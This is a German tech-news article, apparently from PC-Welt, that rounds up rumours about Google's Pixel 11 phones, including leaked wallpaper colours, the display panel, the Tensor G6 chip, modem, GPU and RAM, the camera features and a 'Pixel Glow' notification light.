<p>Seitdem diese „Pro Fold“-Hintergrundbilder durchgesickert sind, <a href="https://t.me/mysticleaks/184" target="_blank" rel="noreferrer noopener">sind weitere aufgetaucht</a>, die darauf hindeuten, was die anderen Smartphones der Reihe erwarten könnte – und dies deutet auf eine Gesamtstrategie hin, mit der Google möglicherweise von einigen der eher bombastischen Farben der Vergangenheit abrücken möchte.</p>



<p>Für das Pixel 11 liegen uns vier Hintergrundbilder vor, die alle in gedeckteren Farbtönen gehalten sind und sich deutlich vom fast neonartigen „Lemongrass“ des Pixel 10 oder dem „Berry“ des <a href="https://www.pcwelt.de/article/3104634/google-pixel-10a-test.html" target="_blank" rel="noreferrer noopener">Pixel 10a </a>unterscheiden.</p>



<ul class="wp-block-list">
<li>Schwarz</li>



<li>Grün</li>



<li>Rot/Rosa</li>



<li>Lila/Grau</li>
</ul>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b727c"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Pixel-11-wallpaper.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Pixel 11 wallpaper" class="wp-image-3156410" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Mystic Leaks</p></div>



<p>Ähnlich verhält es sich mit dem 11 Pro und dem Pro XL, da diese dem gleichen Designkonzept folgen, jedoch eine leicht abweichende Farbpalette aufweisen. Sollten diese Hintergrundbilder – wie in den vergangenen Jahren – nahtlos mit den Farbvarianten der Hardware harmonieren, können wir für das Jahr 2026 eine noch raffiniertere Auswahl an Pixel-Smartphones erwarten.</p>



<ul class="wp-block-list">
<li>Beige/Braun</li>



<li>Blau/Silber</li>



<li>Grün</li>



<li>Schwarz</li>
</ul>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b77d1"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Pixel-11-Pro-wallpaper.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Pixel 11 Pro wallpaper" class="wp-image-3156412" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Mystic Leaks</p></div>
</div></div>
<!-- @@AD gpt-leaderboardmainbod-1 PRE @@--><div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false" data-aaad="true" data-aa-adunit="/8456/IDG.DE_B2C_PCWelt.de/feature_door" data-aa-targeting='{"pos":"BTF1"}'>
				</div><!-- @@AD gpt-leaderboardmainbod-1 POST @@-->


<div class="wp-block-listicle-chart"><div class="listicle-chart-separator"></div><div class="wp-block-listicle-chart-item listicle-chart-item">
<h3 class="wp-block-heading">Pixel 11: Display</h3>



<p>Google wird bei der Pixel-11-Serie voraussichtlich weiterhin auf hochauflösende OLED-Displays setzen, wobei Verbesserungen bei Helligkeit, Farbgenauigkeit und Bildwiederholfrequenz zu erwarten sind.</p>



<p>Die einzige Neuigkeit, die uns hierzu vorliegt, ist, dass Google für die Pixel-11-Reihe <a href="https://m.etnews.com/20260409000346" target="_blank" rel="noreferrer noopener">angeblich das Spitzenmodell M16 OLED-Panel von Samsung Display verwenden wird</a>, womit es den iPhone-18-Pro-Modellen (und auch den Galaxy-Modellen von Samsung Mobile) zuvorkommen wird.</p>



<p>Es liegen zwar noch kaum Details vor, doch das Panel dürfte in puncto Helligkeit, Farbwiedergabe, Lebensdauer und Energieeffizienz das Beste bieten.</p>



<p>Sollte Google die Displaygröße im Vergleich zur Pixel-10-Serie nicht ändern, gelten für die Pixel-10-Modelle folgende Spezifikationen:</p>



<ul class="wp-block-list">
<li>Pixel 10: 6,3-Zoll-Actua-OLED, 3.000 Nits</li>



<li>Pixel 10 Pro: 6,3-Zoll-Super-Actua-LTPO-OLED, 3.300 Nits</li>



<li>Pixel 10 Pro XL: 6,8-Zoll-Super-Actua-LTPO-OLED, 3.300 Nits</li>



<li>Pixel 10 Pro Fold: 8-Zoll-Super-Actua-Flex-LTPO-OLED, 3.000 Nits</li>
</ul>



<p>Angesichts der aktuellen Trends könnte die Pixel-11-Serie die derzeitige Obergrenze von 120 Hertz bei der Bildwiederholfrequenz überschreiten und so flüssigeres Scrollen sowie reaktionsschnellere Interaktionen ermöglichen.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b80cc"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/08/google-pixel-10-pro-xl-3.jpg?quality=50&amp;strip=all&amp;w=1200" alt="google pixel 10 pro xl 3" class="wp-image-2884902" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Der Bildschirm des Pixel 11 Pro XL</figcaption></figure><p class="imageCredit">Anyron Copeman / Foundry</p></div>
</div></div>
<!-- @@AD gpt-leaderboardmainbod-2 PRE @@--><div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false" data-aaad="true" data-aa-adunit="/8456/IDG.DE_B2C_PCWelt.de/feature_door" data-aa-targeting='{"pos":"BTF2"}'>
				</div><!-- @@AD gpt-leaderboardmainbod-2 POST @@-->


<div class="wp-block-listicle-chart"><div class="listicle-chart-separator"></div><div class="wp-block-listicle-chart-item listicle-chart-item">
<h3 class="wp-block-heading">Pixel 11: Leistung</h3>



<p>Google wird bei der Pixel-11-Reihe mit dem Tensor G6 auf einen neuen Chipsatz umsteigen. Auch wenn dies für niemanden eine Überraschung sein dürfte (ein neuer Tensor-Chip ist seit Jahren ein fester Bestandteil jeder neuen Generation), gibt es dieses Mal einige Verbesserungen, die einen enormen Einfluss auf die Leistung haben könnten.</p>



<p>Eine der ersten Informationen, auf die wir stießen, stammt noch aus der Zeit, bevor das Pixel 10 überhaupt in den Handel kam: Einem <a href="https://x.com/dnystedt/status/1936955306397086001" target="_blank" rel="noreferrer noopener">Bericht</a> zufolge soll der neue Tensor G6 im effizienteren 2-Nanometer-Verfahren hergestellt werden, was erhebliche Auswirkungen auf die alltägliche Leistungsfähigkeit der CPU haben könnte.</p>



<figure class="wp-block-embed is-type-rich is-provider-x wp-block-embed-x"><div class="wp-block-embed__wrapper">
<blockquote class="twitter-tweet" data-width="500" data-dnt="true"><p lang="en" dir="ltr">Google’s Tensor G6 smartphone chip will be made with TSMC’s 2nm production process, media report, citing unnamed supply chain sources, and adding the Tensor G5 was transferred to TSMC from Samsung and will be inside Pixel smartphones later this year. Meanwhile, Tesla’ AI 5 chips…</p>— Dan Nystedt (@dnystedt) <a href="https://x.com/dnystedt/status/1936955306397086001?ref_src=twsrc%5Etfw">June 23, 2025</a></blockquote>
</div></figure>



<p>Geht man noch einen Schritt weiter, scheint es nun so, als würde Google auf <a href="https://t.me/mysticleaks/161?comment=48458">den neuesten C1-Ultra-Kern von Arm</a> umsteigen, der eine Taktrate von 4,11 GHz erreichen kann. Zum Vergleich: Das entspricht der Taktrate des Mediatek Dimensity 9500, der das Super-Flaggschiff <a href="https://www.pcwelt.de/article/2967222/oppo-find-x9-pro-test.html" target="_blank" rel="noreferrer noopener">Oppo Find X9 Pro</a> antreibt.</p>



<p>Angesichts der Tatsache, wie stark Google die KI-Verarbeitung auf dem Gerät selbst vorantreibt, könnte ein effizienterer Tensor-Chip Google in Zukunft auch mehr Spielraum für komplexere KI-gesteuerte Aufgaben bieten.</p>



<p>Ein weiterer <a href="https://t.me/mysticleaks/144" target="_blank" rel="noreferrer noopener">Bericht</a> deutet darauf hin, dass Google neben dem Tensor G6 von einem Modem der Marke Samsung (was bislang die Regel war) auf ein von Mediatek hergestelltes Modem umsteigen wird.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b884e"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/09/Google-Pixel-9-Pro-Fold-review-29.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 9 Pro Fold review 29" class="wp-image-2454265" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<p>Bei dem betreffenden Modem handelt es sich um das MediaTek M90, das eine Reihe bemerkenswerter Funktionen bietet, darunter die Unterstützung von Sub-6- und mmWave-5G-Daten sowie Satellitenkonnektivität. </p>



<p>Die Möglichkeit, in Notfällen eine Satellitenverbindung herzustellen, ist mittlerweile eine allgemein erwartete Funktion bei Flaggschiff-Smartphones, nachdem Apple mit „Emergency SOS“ diesen Trend ins Leben gerufen hat; daher ist es naheliegend, dass Google hier der Konkurrenz einen Schritt voraus sein möchte.</p>



<p>Erwähnenswert ist auch, dass das Modem von Mediatek in Kombination mit dem Tensor G6 energieeffizienter sein könnte, was den Weg für eine längere Akkulaufzeit ebnet. Wir werden es erst mit Sicherheit wissen, wenn wir die Pixel-11-Smartphones zum Testen in die Hände bekommen, aber es ist eine schöne Vorstellung – zumal einige der Pixel-10-Modelle in diesem Bereich nicht gerade glänzen.</p>



<p>Ein bedauerliches Gerücht, das zunehmend an Bedeutung gewinnt, besagt, dass Google dem derzeit von Unternehmen wie Apple und Samsung gesetzten Trend nicht folgen wird, das 128-GB-Modell zugunsten eines 256-GB-Basismodells wegzulassen – was einer unserer größten Kritikpunkte an den bestehenden Pixel-10-Smartphones war.</p>



<p>128 GB Speicherplatz reichen im Jahr 2026 angesichts von Fotos, Videos und unverzichtbaren Apps einfach nicht mehr aus, daher hoffen wir aufrichtig, dass sich dieses Gerücht nicht bewahrheitet, doch es könnte letztendlich ein Ausschlusskriterium für High-End-Nutzer sein, die mehr Speicherplatz wünschen, ohne hohe Summen für ein teureres Modell oder einen Cloud-Abonnementdienst zahlen zu müssen.</p>



<p>Erschwerend kommt hinzu, dass die neuesten Gerüchte zum Pixel 11 nun darauf hindeuten, dass zwar die CPU-Leistung besser sein soll als zuvor, die neue GPU jedoch gar nicht so neu sein wird, da stattdessen ein PowerVR CXTP-48-1536 zum Einsatz kommen soll, der bereits im Jahr 2021 auf den Markt kam.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b8e1f"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/Pixel-10-Pro-Fold-review-18.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Pixel 10 Pro Fold review 18" class="wp-image-2931715" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<p>Auch wenn die PowerVR-GPU möglicherweise eine leichte Leistungssteigerung gegenüber der Pixel-10-Reihe bietet, wäre dies dennoch eine große Enttäuschung, sollte sich dies bestätigen, da damit die derzeit an der Tensor G5 geäußerte Kritik ignoriert wird. Die Gaming-Leistung auf jedem Pixel-10-Smartphone entspricht einfach nicht dem Standard, den man von einem Flaggschiff-Gerät erwarten würde – die neuesten <a href="https://www.pcwelt.de/article/3108173/samsung-galaxy-s26-test.html" target="_blank" rel="noreferrer noopener">Galaxy-S26-Modelle</a> sind ihnen dabei weit überlegen. Für die Gamer unter Ihnen könnte es sich lohnen, sich bei Ihrem nächsten Upgrade anderweitig umzusehen.</p>



<p>Interessant ist, dass – sicherlich als Reaktion auf die aktuelle Speicherkrise, die durch die KI-Entwicklung angeheizt wird – das Pixel 11 Pro und Pro XL nun offenbar mit zwei verschiedenen RAM-Varianten ausgeliefert werden sollen: eine mit 12 GB und die andere mit den üblichen 16 GB.</p>



<p>Zum Hintergrund: 16 GB RAM sind seit dem Pixel 9 Pro der Standard bei Googles Pixels der Pro-Klasse; dass das Unternehmen nun bei einer so zentralen Spezifikation einen Rückzieher macht, sagt viel über den aktuellen Stand der Branche aus. Dies könnte bedeuten, dass die 12-GB-Variante notwendig ist, um das 11 Pro und das Pro XL weiterhin zum gleichen Preis wie ihre Vorgängermodelle anbieten zu können.</p>
</div></div>
<!-- @@AD gpt-leaderboardmainbod-3 PRE @@--><div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false" data-aaad="true" data-aa-adunit="/8456/IDG.DE_B2C_PCWelt.de/feature_door" data-aa-targeting='{"pos":"BTF3"}'>
				</div><!-- @@AD gpt-leaderboardmainbod-3 POST @@-->


<div class="wp-block-listicle-chart"><div class="listicle-chart-separator"></div><div class="wp-block-listicle-chart-item listicle-chart-item">
<h3 class="wp-block-heading">Pixel 11: Kameras</h3>



<p>Die Kameraausstattung der Pixel-11-Serie entwickelt sich zu einer der fortschrittlichsten, die es bei einem Flaggschiff-Smartphone gibt, wobei Google sowohl Hardware als auch KI nutzt, um die Foto- und Videoqualität zu verbessern.</p>



<p>Eines der herausragenden Merkmale, das vom Pixel 11 <a href="https://www.androidauthority.com/google-pixel-10-and-pixel-11-camera-ai-features-3494468/" target="_blank" rel="noreferrer noopener">erwartet </a>wird, ist ein Teleobjektiv der nächsten Generation, das einen bis zu 100-fachen Zoom unterstützt. Diese beeindruckende Zoomfähigkeit, unterstützt durch Algorithmen des maschinellen Lernens im Tensor-G6-Prozessor von Google, könnte darauf abzielen, ähnliche Funktionen von Wettbewerbern wie Samsung zu übertreffen oder ihnen sogar den Rang abzulaufen.</p>



<p>Der 100-fache Zoom ermöglicht es Nutzern, selbst aus großer Entfernung bemerkenswert detailreiche Bilder und Videos aufzunehmen, und setzt damit einen neuen Maßstab für die Zoomqualität von Smartphones. Wir wissen, dass einige der Pixel-10-Modelle einen 100-fachen Super-Res-Zoom bieten; das Pixel 11 dürfte diesem Standard daher mindestens entsprechen.</p>



<p>Außerdem haben wir gesehen, dass das reguläre Pixel 10 ein Teleobjektiv erhalten hat, wenn auch nicht in derselben Qualität wie die Pro-Modelle. Auch hier könnte eine Dreifach-Kamera auf der Rückseite nun zum Standard für Pixel-Smartphones werden.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b9642"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/08/Google-Pixel-10-Lemongrass-2.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 10 Lemongrass 2" class="wp-image-2883754" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Chris Martin / Foundry</p></div>



<p>Gerüchten zufolge soll das Pixel 11 zudem über einen verbesserten „Cinematic Blur“-Modus verfügen, der den immersiven „Bokeh“-Effekt in Videos verstärkt. Diese Funktion wird voraussichtlich 4K-Videos mit 30 Bildern pro Sekunde unterstützen und so eine kinoreife Qualität bieten, die das Storytelling in Videos auf ein neues Niveau hebt.</p>



<p>Darüber hinaus könnte eine neue „Video Relight“-Option eingeführt werden, mit der Nutzer die Lichtverhältnisse innerhalb eines aufgenommenen Videos anpassen können, um in Echtzeit Lichtveränderungen zu simulieren und den Szenen so mehr Tiefe und Dramatik zu verleihen. Diese Funktion wird Berichten zufolge von der „Cinematic Rendering Engine“ im Tensor G6 unterstützt, wodurch der Stromverbrauch, der typischerweise mit unscharfen Videoaufnahmen verbunden ist, erheblich reduziert wird.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b9b4c"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/09/Google-Pixel-9-Pro-Fold-review-27.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 9 Pro Fold review 27" class="wp-image-2454276" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<p>Eine weitere spannende Neuerung ist der „Ultra Low Light Video“-Modus, auch als „Night Sight Video“ bezeichnet, der darauf ausgelegt ist, die Videoqualität bei schlechten Lichtverhältnissen zu verbessern.</p>



<p>Im Gegensatz zu früheren „Night Sight“-Videomodi, die eine Cloud-Verarbeitung erforderten, soll diese Funktion dank der fortschrittlichen Bildverarbeitungsfähigkeiten des Tensor-G6-Chips vollständig auf dem Gerät selbst ausgeführt werden.</p>



<p><a href="https://www.androidauthority.com/google-pixel-10-and-pixel-11-camera-ai-features-3494468/" target="_blank" rel="noreferrer noopener">Android Authority</a> berichtet, dass Google den „Ultra Low Light Video“-Modus so konzipiert hat, dass er in Umgebungen mit einer Umgebungshelligkeit zwischen 5 und 10 Lux – was in etwa der Helligkeit eines schwach beleuchteten Raums oder von Kerzenlicht entspricht – optimale Ergebnisse liefert.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4ba090"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/09/Google-Pixel-9-Pro_review_13.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 9 Pro review 13" class="wp-image-2457629" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Dominik Tomaszewski / Foundry</p></div>



<p>Durch die vollständige Verlagerung dieses Prozesses auf das Gerät könnte die Pixel-11-Serie ihren Nutzern die Möglichkeit bieten, hellere und klarere Videos bei schlechten Lichtverhältnissen aufzunehmen, ohne dass eine Internetverbindung erforderlich ist.</p>



<p>Obwohl konkrete Angaben zu den Objektiven dieser neuen Smartphones noch rar sind, scheint es nun wahrscheinlich, dass das Pixel 11 und das Pixel 11 Pro Fold über ein völlig neues 50-Megapixel-Hauptobjektiv verfügen werden, während das 11 Pro und das 11 Pro XL ein anderes, aber ebenfalls neues 50-Megapixel-Hauptobjektiv sowie ein verbessertes Teleobjektiv gemeinsam nutzen werden.</p>



<p>Sollten sich diese Gerüchte bestätigen, könnte die Kameraausstattung insgesamt einen deutlichen Qualitätssprung verzeichnen, was den neuen Pixel-Modellen sicherlich dabei helfen würde, sich von den aktuellen Kamera-Favoriten von Oppo, Vivo und Xiaomi abzuheben.</p>



<h3 class="wp-block-heading">Pixel 11: Funktionen, darunter „Pixel Glow“</h3>



<p>Eine wachsende Flut von <a href="https://9to5google.com/2026/04/16/pixel-glow-laptop/" target="_blank" rel="noreferrer noopener">Gerüchten</a> deutet darauf hin, dass Google eine eigene Version der „Glyph“-Leuchten von Nothing einführen will, bekannt als „Pixel Glow“. Da uns die bereits erwähnten Renderings vorliegen, ist natürlich klar, dass das Konzept nicht genau dieselbe Designphilosophie verfolgen wird, die bei den Nothing-Smartphones eher weitläufig umgesetzt ist, sondern vielmehr die Idee, bestimmte Benachrichtigungen durch Lichter anzuzeigen, wenn das Smartphone mit der Vorderseite nach unten liegt.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4ba684"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/03/PXL_20250310_111828487.jpg?quality=50&amp;strip=all&amp;w=1200" alt="PXL 20250310 111828487" class="wp-image-2632982" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Mattias Inghe</p></div>



<p>Die Existenz einer solchen Funktion wurde in einer Beta-Version von Android 17 entdeckt, wobei in den begleitenden Hinweisen erläutert wird, dass die Funktion „durch dezente Licht- und Farbsignale auf der Rückseite Ihres Geräts Sie über wichtige Aktivitäten informiert“. Es ist anzunehmen, dass sich „Pixel Glow“ – basierend auf dem, was wir vom Design des Pixel 11 gesehen haben – entweder auf den Blitzbereich des leicht überarbeiteten Kameraausstellers oder auf das Google-„G“-Logo in der Mitte beschränken wird; wir tippen jedoch auf Ersteres, da in den Hinweisen auch erwähnt wird, dass aktivierte Blitzbenachrichtigungen „Pixel Glow“ vollständig außer Kraft setzen.</p>



<p>Es ist auf jeden Fall eine coole Funktion, da sie manchen Menschen helfen könnte, einen gesünderen Umgang mit ihrem Smartphone zu pflegen. Genau wie bei den „Nothing Glyphs“ sollen diese lichtbasierten Benachrichtigungen Sie nur auf wirklich wichtige Angelegenheiten aufmerksam machen, sodass Sie weniger dazu neigen, sofort durch Ihr Smartphone zu scrollen, sobald eine Benachrichtigung auf dem Bildschirm erscheint.</p>



